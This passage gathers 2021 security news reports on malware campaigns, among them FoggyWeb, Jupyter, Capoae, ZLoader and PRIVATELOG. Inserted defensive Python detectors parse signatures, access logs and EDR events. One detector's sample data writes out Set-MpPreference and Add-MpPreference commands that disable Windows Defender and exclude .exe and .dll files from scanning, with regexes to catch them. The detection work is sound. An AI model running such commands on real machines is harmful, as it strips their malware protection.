The malware is not only aimed at VIP members of underground forums, but also stands out for a barrage of anti-analysis methods it uses to thwart detection and intentionally complicate reverse engineering. Furthermore, infection chains involving BloodyStealer are also noteworthy for the fact that threat actors who had purchased a license to the product used the stealer in conjunction with other malware campaigns.

Kaspersky did not reveal the attack vectors used to stage the incursions, but it's typical of adversaries to target users looking to download games from fraudulent sites or through email and chat messages containing links to external rogue sites that trick gamers into entering their account information.

"BloodyStealer is a prime example of an advanced tool used by cybercriminals to penetrate the gaming market," the researchers said. "With its interesting capabilities, such as extraction of browser passwords, cookies, and environment information as well as grabbing information related to online gaming platforms, BloodyStealer provides value in terms of data that can be stolen from gamers and later sold on the darknet."


Microsoft Warns of FoggyWeb Malware Targeting Active Directory FS Servers
6.10.21 
Virus  Thehackernews
Microsoft on Monday revealed new malware deployed by the hacking group behind the SolarWinds supply chain attack last December to deliver additional payloads and steal sensitive information from Active Directory Federation Services (AD FS) servers.

The tech giant's Threat Intelligence Center (MSTIC) codenamed the "passive and highly targeted backdoor" FoggyWeb, making it the threat actor tracked as Nobelium's latest tool in a long list of cyber weaponry such as Sunburst, Sunspot, Raindrop, Teardrop, GoldMax, GoldFinder, Sibot, Flipflop, NativeZone, EnvyScout, BoomBox, and VaporRage.

"Once Nobelium obtains credentials and successfully compromises a server, the actor relies on that access to maintain persistence and deepen its infiltration using sophisticated malware and tools," MSTIC researchers said. "Nobelium uses FoggyWeb to remotely exfiltrate the configuration database of compromised AD FS servers, decrypted token-signing certificate, and token-decryption certificate, as well as to download and execute additional components."

Microsoft said it observed FoggyWeb in the wild as early as April 2021, describing the implant as a "malicious memory-resident DLL."

Nobelium is the moniker assigned by the company to the nation-state hacking group widely known as APT29, The Dukes, or Cozy Bear — an advanced persistent threat that has been attributed to Russia's Foreign Intelligence Service (SVR) — and believed to have been behind the wide-ranging attack targeting SolarWinds that came to light in December 2020. The adversary behind this campaign is also being monitored under a variety of codenames like UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).

FoggyWeb, installed by a loader via a technique called DLL search order hijacking, is capable of transmitting sensitive information from a compromised AD FS server as well as receiving and executing additional malicious payloads retrieved from a remote attacker-controlled server. It's also engineered to monitor all incoming HTTP GET and POST requests sent to the server from the intranet (or internet) and to intercept those that are of interest to the actor.

"Protecting AD FS servers is key to mitigating Nobelium attacks," the researchers said. "Detecting and blocking malware, attacker activity, and other malicious artifacts on AD FS servers can break critical steps in known Nobelium attack chains. Customers should review their AD FS Server configuration and implement changes to secure these systems from attacks."


A New Jupyter Malware Version is Being Distributed via MSI Installers
6.10.21 
Virus   Thehackernews
Cybersecurity researchers have charted the evolution of Jupyter, a .NET infostealer known for singling out the healthcare and education sectors and for its effectiveness at defeating most endpoint security scanning solutions.

The new delivery chain, spotted by Morphisec on September 8, underscores that the malware has not just continued to remain active but also showcases "how threat actors continue to develop their attacks to become more efficient and evasive." The Israeli company said it's currently investigating the scale and scope of the attacks.

First documented in November 2020, Jupyter (aka Solarmarker) is likely Russian in origin and primarily targets Chromium, Firefox, and Chrome browser data, with additional capabilities that allow for full backdoor functionality, including features to siphon information and upload the details to a remote server and download and execute further payloads. Forensic evidence gathered by Morphisec shows that multiple versions of Jupyter began emerging starting May 2020.

In August 2021, Cisco Talos attributed the intrusions to a "fairly sophisticated actor largely focused on credential and residual information theft." Cybersecurity firm CrowdStrike, earlier this February, described the malware as packing a multi-stage, heavily obfuscated PowerShell loader, which leads to the execution of a .NET compiled backdoor.

While previous attacks incorporated legitimate binaries of well-known software such as Docx2Rtf and Expert PDF, the latest delivery chain puts to use another PDF application called Nitro Pro. The attacks start with the deployment of an MSI installer payload that is over 100MB in size, allowing it to bypass anti-malware engines, and that is obfuscated using a third-party application packaging wizard called Advanced Installer.

Running the MSI payload leads to the execution of a PowerShell loader embedded within a legitimate binary of Nitro Pro 13, two variants of which have been observed signed with a valid certificate belonging to an actual business in Poland, suggesting a possible certificate impersonation or theft. The loader, in the final stage, decodes and runs the in-memory Jupyter .NET module.

"The evolution of the Jupyter infostealer/backdoor from when we first identified it in 2020 proves the truth of the statement that threat actors are always innovating," Morphisec researcher Nadav Lorber said. "That this attack continues to have low or no detections on VirusTotal further indicates the facility with which threat actors evade detection-based solutions."


Google Warns of a New Way Hackers Can Make Malware Undetectable on Windows
6.10.21 
Virus  Thehackernews
Cybersecurity researchers have disclosed a novel technique adopted by a threat actor to deliberately evade detection with the help of malformed digital signatures of its malware payloads.

"Attackers created malformed code signatures that are treated as valid by Windows but are not able to be decoded or checked by OpenSSL code — which is used in a number of security scanning products," Google Threat Analysis Group's Neel Mehta said in a write-up published on Thursday.

The new mechanism was observed to be exploited by a notorious family of unwanted software known as OpenSUpdater that's used to download and install other suspicious programs on compromised systems. Most targets of the campaign are users located in the U.S. who are prone to downloading cracked versions of games and other grey-area software.

The findings come from a set of OpenSUpdater samples uploaded to VirusTotal at least since mid-August.

While adversaries in the past have relied on illegally obtained digital certificates to sneak adware and other unwanted software past malware detection tools, or have embedded the attack code into digitally signed, trusted software components by poisoning the software supply chain, OpenSUpdater stands out for its intentional use of a malformed signature to slip through defenses.

The artifacts are signed with an invalid leaf X.509 certificate that's edited in such a manner that the 'parameters' element of the SignatureAlgorithm field includes an End-of-Content (EOC) marker instead of a NULL tag. Although such encodings are rejected as invalid by products using OpenSSL to retrieve signature information, checks on Windows systems would permit the file to be run without any security warnings.
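To make the encoding difference concrete, here is an added example (not code from the original article or from Google TAG) of a strict DER reader for an X.509 AlgorithmIdentifier. It reports whether the 'parameters' element is a proper NULL (bytes 05 00), the End-of-Content marker (bytes 00 00) described above, absent, or something else, so a scanner can flag the malformed form instead of either accepting it or failing to decode. The two sample encodings are constructed for sha256WithRSAEncryption and are not taken from any real signed file.

```python
"""Added example: strict DER reader for an X.509 AlgorithmIdentifier that
reports how its 'parameters' element is encoded, so an EOC marker standing
in for NULL can be flagged rather than silently accepted or rejected."""


def read_tlv(data: bytes, off: int = 0):
    """Read one tag-length-value triple starting at `off`.
    Returns (tag, value_bytes, offset_after_value). Only single-byte tags
    and definite lengths are accepted, which is all DER permits here."""
    if off + 2 > len(data):
        raise ValueError("truncated TLV header")
    tag, first = data[off], data[off + 1]
    off += 2
    if tag & 0x1F == 0x1F:
        raise ValueError("multi-byte tag numbers are not supported")
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0:
            raise ValueError("indefinite length is BER, not DER")
        if off + nbytes > len(data):
            raise ValueError("truncated length field")
        length = int.from_bytes(data[off:off + nbytes], "big")
        off += nbytes
    if off + length > len(data):
        raise ValueError("truncated value")
    return tag, data[off:off + length], off + length


def decode_oid(value: bytes) -> str:
    """Decode OBJECT IDENTIFIER contents into dotted form."""
    if not value or value[-1] & 0x80:
        raise ValueError("malformed OID")
    arcs = [value[0] // 40, value[0] % 40]
    cur = 0
    for b in value[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    return ".".join(str(a) for a in arcs)


def classify_algorithm_identifier(data: bytes) -> dict:
    """Parse SEQUENCE { algorithm OID, parameters ANY OPTIONAL } and report
    whether `parameters` is absent, a NULL (05 00), an End-of-Content
    marker (00 00) or some other tag. EOC is only legal as the terminator
    of an indefinite-length BER value, so inside a definite-length DER
    SEQUENCE it is malformed even though the byte count lines up."""
    tag, body, end = read_tlv(data)
    if tag != 0x30:
        raise ValueError("AlgorithmIdentifier must be a SEQUENCE")
    if end != len(data):
        raise ValueError("trailing bytes after SEQUENCE")
    oid_tag, oid_val, off = read_tlv(body)
    if oid_tag != 0x06:
        raise ValueError("first element must be an OBJECT IDENTIFIER")
    result = {"oid": decode_oid(oid_val), "parameters": "absent", "der_valid": True}
    if off == len(body):
        return result
    ptag, pval, off = read_tlv(body, off)
    if ptag == 0x05 and pval == b"":
        result["parameters"] = "NULL"
    elif ptag == 0x00 and pval == b"":
        result["parameters"] = "EOC"
        result["der_valid"] = False
    else:
        result["parameters"] = f"tag 0x{ptag:02x}"
    if off != len(body):
        result["der_valid"] = False
    return result


# Constructed sample encodings of sha256WithRSAEncryption (1.2.840.113549.1.1.11);
# neither is taken from a real signed file.
WELL_FORMED = bytes.fromhex("300d06092a864886f70d01010b0500")  # parameters = NULL
MALFORMED = bytes.fromhex("300d06092a864886f70d01010b0000")    # parameters = EOC

if __name__ == "__main__":
    for name, blob in (("well-formed", WELL_FORMED), ("malformed", MALFORMED)):
        print(name, classify_algorithm_identifier(blob))
```

The point of returning a classification rather than raising is operational: a scanner that throws on the EOC byte pair behaves exactly like the OpenSSL-based products the article describes, whereas one that records "EOC, not DER-valid" has a signal it can alert on.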

"This is the first time TAG has observed actors using this technique to evade detection while preserving a valid digital signature on PE files," Mehta said.

"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer. Attackers who are able to obscure their identity in signatures without affecting the integrity of the signature can avoid detection longer and extend the lifetime of their code-signing certificates to infect more systems."


New Capoae Malware Infiltrates WordPress Sites and Installs Backdoored Plugin
6.10.21 
Virus  Thehackernews

A recently discovered wave of malware attacks has been spotted using a variety of tactics to enslave susceptible machines with easy-to-guess administrative credentials to co-opt them into a network with the goal of illegally mining cryptocurrency.

"The malware's primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they've been infected, these systems are then used to mine cryptocurrency," Akamai security researcher Larry Cashdollar said in a write-up published last week.

The PHP malware — codenamed "Capoae" (short for "Сканирование," the Russian word for "Scanning") — is said to be delivered to the hosts via a backdoored addition to a WordPress plugin called "download-monitor," which gets installed after successfully brute-forcing WordPress admin credentials. The attacks also involve the deployment of a Golang binary with decryption functionality, with the obfuscated payloads retrieved by leveraging the trojanized plugin to make a GET request from an actor-controlled domain.

Also included is a feature to decrypt and execute additional payloads, while the Golang binary takes advantage of exploits for multiple remote code execution flaws in Oracle WebLogic Server (CVE-2020-14882), NoneCms (CVE-2018-20062), and Jenkins (CVE-2019-1003029 and CVE-2019-1003030) to brute force its way into systems running SSH and ultimately launch the XMRig mining software.

What's more, the attack chain stands out for its persistence tricks, which include choosing a legitimate-looking system path on the disk where system binaries are likely to be found and generating a random six-character filename that is then used to copy itself into the new location on the system before deleting the malware upon execution.

"The Capoae campaign's use of multiple vulnerabilities and tactics highlights just how intent these operators are on getting a foothold on as many machines as possible," Cashdollar said. "The good news is, the same techniques we recommend for most organizations to keep systems and networks secure still apply here."

"Don't use weak or default credentials for servers or deployed applications," Cashdollar added. "Ensure you're keeping those deployed applications up to date with the latest security patches and check in on them from time to time. Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts and suspicious access log entries, etc., will help you potentially identify compromised machines."
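One of the "suspicious access log entries" Cashdollar refers to is the credential brute force against the WordPress login page that precedes the plugin install. The following is an added example, not code from Akamai or the article, that summarises wp-login.php activity per client in an Apache/nginx combined-format access log. It assumes standard WordPress behaviour (a failed login POST re-renders the form with HTTP 200, a successful one redirects to the dashboard with HTTP 302); the log lines are constructed sample data.

```python
"""Added example: surface the brute-force-then-admin-action pattern in a
WordPress access log. Sample lines are constructed, not from a real server."""
import re
from collections import defaultdict

# Apache/nginx "combined" log format; lines that do not match are skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample: one client hammering wp-login.php, then installing a
# plugin once a guess succeeds; one ordinary visitor who logs in normally.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Sep/2021:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1520
203.0.113.7 - - [21/Sep/2021:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1520
203.0.113.7 - - [21/Sep/2021:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1520
203.0.113.7 - - [21/Sep/2021:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.7 - - [21/Sep/2021:10:00:05 +0000] "POST /wp-admin/plugin-install.php HTTP/1.1" 200 880
198.51.100.4 - - [21/Sep/2021:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 9102
198.51.100.4 - - [21/Sep/2021:10:01:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""


def parse_lines(text):
    """Yield one dict per parseable log line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def analyze_wp_logins(text):
    """Per client IP: failed login count, whether a login later succeeded,
    and which wp-admin paths were requested after that success.
    Assumption (WordPress behaviour): failed POST -> 200, success -> 302."""
    stats = defaultdict(lambda: {"failed": 0, "succeeded": False, "admin_paths": []})
    for rec in parse_lines(text):
        s = stats[rec["ip"]]
        path = rec["path"]
        if rec["method"] == "POST" and path.startswith("/wp-login.php"):
            if rec["status"] == "200":
                s["failed"] += 1
            elif rec["status"] == "302":
                s["succeeded"] = True
        elif path.startswith("/wp-admin/") and s["succeeded"]:
            s["admin_paths"].append(path)
    return dict(stats)


def suspicious_clients(text, threshold=3):
    """Clients with at least `threshold` failed logins; those that then
    logged in and touched wp-admin are listed first."""
    hits = {ip: s for ip, s in analyze_wp_logins(text).items() if s["failed"] >= threshold}
    return sorted(hits.items(), key=lambda kv: (not kv[1]["succeeded"], kv[0]))


if __name__ == "__main__":
    for ip, summary in suspicious_clients(SAMPLE_LOG):
        print(ip, summary)
```

A failed-login count alone is noisy on a public site; the combination that matters here is a run of failures from one client followed by a success and then administrative requests, which is the sequence the trojanized download-monitor plugin install would leave behind.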


A New Wave of Malware Attack Targeting Organizations in South America
6.10.21 
Virus  Thehackernews

A spam campaign delivering spear-phishing emails aimed at South American organizations has retooled its techniques to include a wide range of commodity remote access trojans (RATs) and geolocation filtering to avoid detection, according to new research.

Cybersecurity firm Trend Micro attributed the attacks to an advanced persistent threat (APT) tracked as APT-C-36 (aka Blind Eagle), a suspected South America espionage group that has been active since at least 2018 and previously known for setting its sights on Colombian government institutions and corporations spanning financial, petroleum, and manufacturing sectors.

Primarily spread via fraudulent emails by masquerading as Colombian government agencies, such as the National Directorate of Taxes and Customs (DIAN), the infection chain commences when the message recipients open a decoy PDF or Word document that claims to be a seizure order tied to their bank accounts and click on a link that's been generated from a URL shortener service like cort.as, acortaurl.com, and gtly.to.

"These URL shorteners are capable of geographical targeting, so if a user from a country not targeted by the threat actors clicks on the link, they will be redirected to a legitimate website," Trend Micro researchers detailed in a report published last week. "The URL shorteners also have the ability to detect the major VPN services, in which case, the shortened link leads the users to a legitimate website instead of redirecting them to the malicious link."

Should the victim meet the location criteria, the user is redirected to a file hosting server, and a password-protected archive is automatically downloaded, the password for which is specified in the email or the attachment, ultimately leading to the execution of a C++-based remote access trojan called BitRAT that first came to light in August 2020.

Multiple verticals, including government, financial, healthcare, telecommunications, and energy, oil, and gas, are said to have been affected, with a majority of the targets for the latest campaign located in Colombia and a smaller fraction also coming from Ecuador, Spain, and Panama.

"APT-C-36 selects their targets based on location and most likely the financial standing of the email recipient," the researchers said. "These, and the prevalence of the emails, lead us to conclude that the threat actor's ultimate goal is financial gain rather than espionage."


Numando: A New Banking Trojan Targeting Latin American Users
20.9.21 
Virus  Thehackernews
A newly spotted banking trojan has been caught leveraging legitimate platforms like YouTube and Pastebin to store its encrypted, remote configuration and commandeer infected Windows systems, making it the latest to join the long list of malware targeting Latin America (LATAM) after Guildma, Javali, Melcoz, Grandoreiro, Mekotio, Casbaneiro, Amavaldo, Vadokrist, and Janeleiro.

The threat actor behind this malware family — dubbed "Numando" — is believed to have been active since at least 2018.

"[Numando brings] interesting new techniques to the pool of Latin American banking trojans' tricks, like using seemingly useless ZIP archives or bundling payloads with decoy BMP images," ESET researchers said in a technical analysis published on Friday. "Geographically, it focuses almost exclusively on Brazil with rare campaigns in Mexico and Spain."

Written in Delphi, the malware comes with an array of backdoor capabilities that allow it to control compromised machines, simulate mouse and keyboard actions, restart and shutdown the host, display overlay windows, capture screenshots, and terminate browser processes. Numando is "almost exclusively" propagated by spam campaigns, ensnaring several hundred victims to date, according to the cybersecurity firm's telemetry data.

The attacks begin with a phishing message that comes embedded with a ZIP attachment containing an MSI installer, which, in turn, includes a cabinet archive with a legitimate application, an injector, and an encrypted Numando banking trojan DLL. Executing the MSI leads to the execution of the application, causing the injector module to be side-loaded and decrypt the final-stage malware payload.

In an alternate distribution chain observed by ESET, the malware takes the form of a "suspiciously large" but valid BMP image file, from which the injector extracts and executes the Numando banking trojan. What makes the campaign stand out is its use of YouTube video titles and descriptions — now taken down — to store the remote configuration such as the IP address of the command-and-control server.

"[The malware] uses fake overlay windows, contains backdoor functionality, and utilizes MSI [installer]," the researchers said. "It is the only LATAM banking trojan written in Delphi that uses a non-Delphi injector and its remote configuration format is unique, making two reliable factors when identifying this malware family."


New Malware Targets Windows Subsystem for Linux to Evade Detection
19.9.21 
Virus  Thehackernews
A number of malicious samples have been created for the Windows Subsystem for Linux (WSL) with the goal of compromising Windows machines, highlighting a sneaky method that allows the operators to stay under the radar and thwart detection by popular anti-malware engines.

The "distinct tradecraft" marks the first instance where a threat actor has been found abusing WSL to install subsequent payloads.

"These files acted as loaders running a payload that was either embedded within the sample or retrieved from a remote server and was then injected into a running process using Windows API calls," researchers from Lumen Black Lotus Labs said in a report published on Thursday.

Windows Subsystem for Linux, launched in August 2016, is a compatibility layer that's designed to run Linux binary executables (in ELF format) natively on the Windows platform without the overhead of a traditional virtual machine or dual-boot setup.

The earliest artifacts date back to May 3, 2021, with a series of Linux binaries uploaded every two to three weeks until August 22, 2021. Not only are the samples written in Python 3 and converted into an ELF executable with PyInstaller, but the files are also orchestrated to download shellcode from a remote command-and-control server and employ PowerShell to carry out follow-on activities on the infected host.

This secondary "shellcode" payload is then injected into a running Windows process using Windows API calls for what Lumen described as "ELF to Windows binary file execution," but not before the sample attempts to terminate suspected antivirus products and analysis tools running on the machine. What's more, the use of standard Python libraries makes some of the variants interoperable on both Windows and Linux.

"Thus far, we have identified a limited number of samples with only one publicly routable IP address, indicating that this activity is quite limited in scope or potentially still in development," the researchers said. "As the once distinct boundaries between operating systems continue to become more nebulous, threat actors will take advantage of new attack surfaces."


Malware Attack on Aviation Sector Uncovered After Going Unnoticed for 2 Years
19.9.21 
Virus  Thehackernews

A targeted phishing campaign aimed at the aviation industry for two years may be spearheaded by a threat actor operating out of Nigeria, highlighting how attackers can carry out small-scale cyber offensives for extended periods of time while staying under the radar.

Cisco Talos dubbed the malware attacks "Operation Layover," building on previous research from the Microsoft Security Intelligence team in May 2021 that delved into a "dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT."

"The actor […] doesn't seem to be technically sophisticated, using off-the-shelf malware since the beginning of its activities without developing its own malware," researchers Tiago Pereira and Vitor Ventura said. "The actor also buys the crypters that allow the usage of such malware without being detected, throughout the years it has used several different cryptors, mostly bought on online forums."

The threat actor is believed to have been active at least since 2013. The attacks involve emails containing specific lure documents centered around the aviation or cargo industry that purport to be PDF files but link to a VBScript file hosted on Google Drive, which ultimately leads to the delivery of remote access trojans (RATs) like AsyncRAT and njRAT, leaving organizations vulnerable to an array of security risks. Cisco Talos said it found 31 different aviation-themed lures dating all the way back to August 2018.

Further analysis of the activity associated with different domains used in the attacks shows that the actor weaved multiple RATs into their campaigns, with the infrastructure used as command-and-control (C2) servers for Cybergate RAT, AsyncRAT, and a batch file that's used as part of a malware chain to download and execute other malware.

"Many actors can have limited technical knowledge but still be able to operate RATs or information-stealers, posing a significant risk to large corporations given the right conditions," the researchers said. "In this case, […] what seemed like a simple campaign is, in fact, a continuous operation that has been active for three years, targeting an entire industry with off-the-shelf malware disguised with different crypters."


New Stealthier ZLoader Variant Spreading Via Fake TeamViewer Download Ads
19.9.21 
Virus  Thehackernews

Users searching for TeamViewer remote desktop software on search engines like Google are being redirected to malicious links that drop ZLoader malware onto their systems while simultaneously embracing a stealthier infection chain that allows it to linger on infected devices and evade detection by security solutions.

"The malware is downloaded from a Google advertisement published through Google Adwords," researchers from SentinelOne said in a report published on Monday. "In this campaign, the attackers use an indirect way to compromise victims instead of using the classic approach of compromising the victims directly, such as by phishing."

First discovered in 2016, ZLoader (aka Silent Night and ZBot) is a fully-featured banking trojan and a fork of another banking malware called ZeuS, with newer versions implementing a VNC module that grants adversaries remote access to victim systems. The malware is in active development, with criminal actors spawning an array of variants in recent years, no less fuelled by the leak of ZeuS source code in 2011.

The latest wave of attacks is believed to target users of Australian and German financial institutions with the primary goal of intercepting users' web requests to the banking portals and stealing bank credentials. But the campaign is also noteworthy because of the steps it takes to stay under the radar, including running a series of commands to hide the malicious activity by disabling Windows Defender.

The infection chain commences when a user clicks on an advertisement shown by Google on the search results page and is redirected to the fake TeamViewer site under the attacker's control, thus tricking the victim into downloading a rogue but signed variant of the software ("Team-Viewer.msi"). The fake installer acts as the first stage dropper to trigger a series of actions that involve downloading next-stage droppers aimed at impairing the defenses of the machine and finally downloading the ZLoader DLL payload ("tim.dll").

"At first, it disables all the Windows Defender modules through the PowerShell cmdlet Set-MpPreference," SentinelOne Senior Threat Intelligence Researcher Antonio Pirozzi said. "It then adds exclusions, such as regsvr32, *.exe, *.dll, with the cmdlet Add-MpPreference to hide all the components of the malware from Windows Defender."
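The Defender tampering sequence Pirozzi describes leaves a clear trail in PowerShell script block logging (Event ID 4104, ScriptBlockText). The following is an added example, not code from SentinelOne or the article, that tags logged script blocks for a Set-MpPreference call that switches a -Disable* option on, for Add-MpPreference exclusions, and for the especially broad case of excluding .exe and .dll extensions, and then checks for the disable-then-exclude ordering. The sample blocks are constructed and are not copied from the campaign.

```python
"""Added example: triage PowerShell script block log text for Windows
Defender tampering. Sample blocks are constructed, not from the campaign."""
import re

# Constructed ScriptBlockText values as they might appear in Event ID 4104.
SAMPLE_BLOCKS = [
    "Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true",
    "Add-MpPreference -ExclusionPath 'C:\\Windows\\System32\\regsvr32.exe'",
    "Add-MpPreference -ExclusionExtension '.exe','.dll'",
    "Get-MpPreference | Select-Object DisableRealtimeMonitoring",
    "Set-MpPreference -ScanScheduleDay Everyday",
]

# Set-MpPreference with any -Disable* option set to $true or 1.
DISABLE_RE = re.compile(r"\bSet-MpPreference\b.*\s-Disable\w+\s+(?:\$true|1)\b", re.I | re.S)
# Add-MpPreference introducing an exclusion of any kind.
EXCLUSION_RE = re.compile(
    r"\bAdd-MpPreference\b.*\s-Exclusion(?:Path|Extension|Process)\b", re.I | re.S
)
# Extension exclusions covering executables or libraries blind Defender to
# almost everything that matters, so they get their own tag.
BROAD_EXT_RE = re.compile(r"-ExclusionExtension\b[^\r\n]*\.(?:exe|dll)\b", re.I)


def classify_block(text):
    """Return the list of tags a single script block matches (may be empty)."""
    tags = []
    if DISABLE_RE.search(text):
        tags.append("defender_disable")
    if EXCLUSION_RE.search(text):
        tags.append("defender_exclusion")
        if BROAD_EXT_RE.search(text):
            tags.append("broad_exclusion")
    return tags


def triage(blocks):
    """Return [(index, tags)] for every block that matched at least one rule."""
    out = []
    for i, block in enumerate(blocks):
        tags = classify_block(block)
        if tags:
            out.append((i, tags))
    return out


def tamper_sequence(blocks):
    """True when a Defender disable is followed later in the log by an
    exclusion, the ordering the article describes for this dropper."""
    seen_disable = False
    for block in blocks:
        tags = classify_block(block)
        if "defender_disable" in tags:
            seen_disable = True
        elif seen_disable and "defender_exclusion" in tags:
            return True
    return False


if __name__ == "__main__":
    for index, tags in triage(SAMPLE_BLOCKS):
        print(index, tags, SAMPLE_BLOCKS[index])
    print("disable followed by exclusion:", tamper_sequence(SAMPLE_BLOCKS))
```

Administrators do legitimately call Set-MpPreference (the scan-schedule block above is left untagged for that reason), so the ordering check is what lifts this from a noisy keyword hit to something worth paging on; pair it with the process lineage of the PowerShell host, which for this campaign would lead back to an MSI installer rather than an admin console.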

The cybersecurity firm said it found additional artifacts that mimic popular apps like Discord and Zoom, suggesting that the attackers had multiple campaigns ongoing beyond leveraging TeamViewer.

"The attack chain analyzed in this research shows how the complexity of the attack has grown in order to reach a higher level of stealthiness, using an alternative to the classic approach of compromising victims through phishing emails," Pirozzi explained. "The technique used to install the first stage dropper has been changed from socially engineering the victim into opening a malicious document to poisoning the user's web searches with links that deliver a stealthy, signed MSI payload."


This New Malware Family Using CLFS Log Files to Avoid Detection
3.9.21 
Virus  Thehackernews
Cybersecurity researchers have disclosed details about a new malware family that relies on the Common Log File System (CLFS) to hide a second-stage payload in registry transaction files in an attempt to evade detection mechanisms.

FireEye's Mandiant Advanced Practices team, which made the discovery, dubbed the malware PRIVATELOG, and its installer, STASHLOG. Specifics about the identities of the threat actor or their motives remain unclear.

Although the malware is yet to be detected in real-world attacks aimed at customer environments or be spotted launching any second-stage payloads, Mandiant suspects that PRIVATELOG could still be in development, the work of a researcher, or deployed as part of a highly targeted activity.

CLFS is a general-purpose logging subsystem in Windows that's accessible to both kernel-mode as well as user-mode applications such as database systems, OLTP systems, messaging clients, and network event management systems for building and sharing high-performance transaction logs.

"Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files," Mandiant researchers explained in a write-up published this week. "This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions."

PRIVATELOG and STASHLOG come with capabilities that allow the malicious software to linger on infected devices and avoid detection, including the use of obfuscated strings and control flow techniques that are expressly designed to make static analysis cumbersome. What's more, the STASHLOG installer accepts a next-stage payload as an argument, the contents of which are subsequently stashed in a specific CLFS log file.

Fashioned as an un-obfuscated 64-bit DLL named "prntvpt.dll," PRIVATELOG, in contrast, leverages a technique called DLL search order hijacking in order to load the malicious library when it is called by a victim program, in this case, a service called "PrintNotify."

"Similarly to STASHLOG, PRIVATELOG starts by enumerating *.BLF files in the default user's profile directory and uses the .BLF file with the oldest creation date timestamp," the researchers noted, before using it to decrypt and store the second-stage payload.

Mandiant recommends that organizations apply YARA rules to scan internal networks for signs of malware and watch out for potential Indicators of Compromise (IoCs) in "process", "imageload" or "filewrite" events associated with endpoint detection and response (EDR) system logs.
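Two behaviours in this section, the DLL search order hijacking used by both the FoggyWeb loader and PRIVATELOG (prntvpt.dll loaded on behalf of the PrintNotify service) and PRIVATELOG's use of .BLF files under the default user's profile, map directly onto the "imageload" and "filewrite" EDR events Mandiant points at. The following is an added example, not code from Mandiant or Microsoft, of heuristics over such events: a watched system DLL name loaded from outside the Windows system directories, and a process other than the kernel writing a CLFS .BLF file under a user profile. The trusted directory list, the expected-writer list and the C:\Users\Public path are assumptions for illustration; the events are constructed.

```python
"""Added example: heuristics over constructed EDR imageload/filewrite events
for search-order-hijacked DLL loads and unexpected .BLF writes.
Baselines (SYSTEM_DIRS, EXPECTED_BLF_WRITERS) are assumptions to tune."""
from pathlib import PureWindowsPath

# Assumed trusted homes for system DLLs.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# DLL names loaded by service hosts that are worth watching; prntvpt.dll
# is the name from the article, extend with others from your estate.
WATCHED_DLLS = {"prntvpt.dll"}
# CLFS registry-transaction logs are normally written by the kernel (System).
EXPECTED_BLF_WRITERS = {"system"}

# Constructed events, not from any real sensor.
SAMPLE_EVENTS = [
    {"event": "imageload", "process": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\prntvpt.dll"},
    {"event": "imageload", "process": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Users\Public\prntvpt.dll"},          # assumed hijack location
    {"event": "filewrite", "process": "System",
     "target": r"C:\Users\Default\example.TM.blf"},
    {"event": "filewrite", "process": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Users\Default\example.TM.blf"},
    {"event": "imageload", "process": r"C:\Program Files\Example\app.exe",
     "image": r"C:\Program Files\Example\helper.dll"},
]


def _norm(path):
    """Case-folded Windows path string for comparisons."""
    return str(PureWindowsPath(path)).lower()


def _proc_name(process):
    """Bare process name, whether the sensor logged a path or just a name."""
    return PureWindowsPath(process).name.lower()


def triage_events(events):
    """Return [(index, finding)] for events that match a heuristic."""
    findings = []
    for i, ev in enumerate(events):
        if ev["event"] == "imageload":
            img = PureWindowsPath(ev["image"])
            if img.name.lower() in WATCHED_DLLS and _norm(img.parent) not in SYSTEM_DIRS:
                findings.append((i, "watched_dll_outside_system_dir"))
        elif ev["event"] == "filewrite":
            tgt = PureWindowsPath(ev["target"])
            if (tgt.suffix.lower() == ".blf"
                    and _norm(tgt).startswith("c:\\users\\")
                    and _proc_name(ev["process"]) not in EXPECTED_BLF_WRITERS):
                findings.append((i, "blf_write_by_unexpected_process"))
    return findings


if __name__ == "__main__":
    for index, finding in triage_events(SAMPLE_EVENTS):
        print(index, finding, SAMPLE_EVENTS[index])
```

The DLL rule is deliberately keyed on the file name rather than a hash: search order hijacking works precisely because the loader resolves a well-known name before it reaches the system directory, so the name-plus-directory pair is the stable signal, and a YARA rule on the payload can be layered on top where one exists.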


FIN7 Hackers Using Windows 11 Themed Documents to Drop Javascript Backdoor
3.9.21  
Virus  Thehackernews
A recent wave of spear-phishing campaigns leveraged weaponized Windows 11 Alpha-themed Word documents with Visual Basic macros to drop malicious payloads, including a JavaScript implant, against a point-of-sale (PoS) service provider located in the U.S.

The attacks, which are believed to have taken place between late June and late July 2021, have been attributed with "moderate confidence" to a financially motivated threat actor dubbed FIN7, according to researchers from cybersecurity firm Anomali.

"The specified targeting of the Clearmind domain fits well with FIN7's preferred modus operandi," Anomali Threat Research said in a technical analysis published on September 2. "The group's goal appears to have been to deliver a variation of a JavaScript backdoor used by FIN7 since at least 2018."

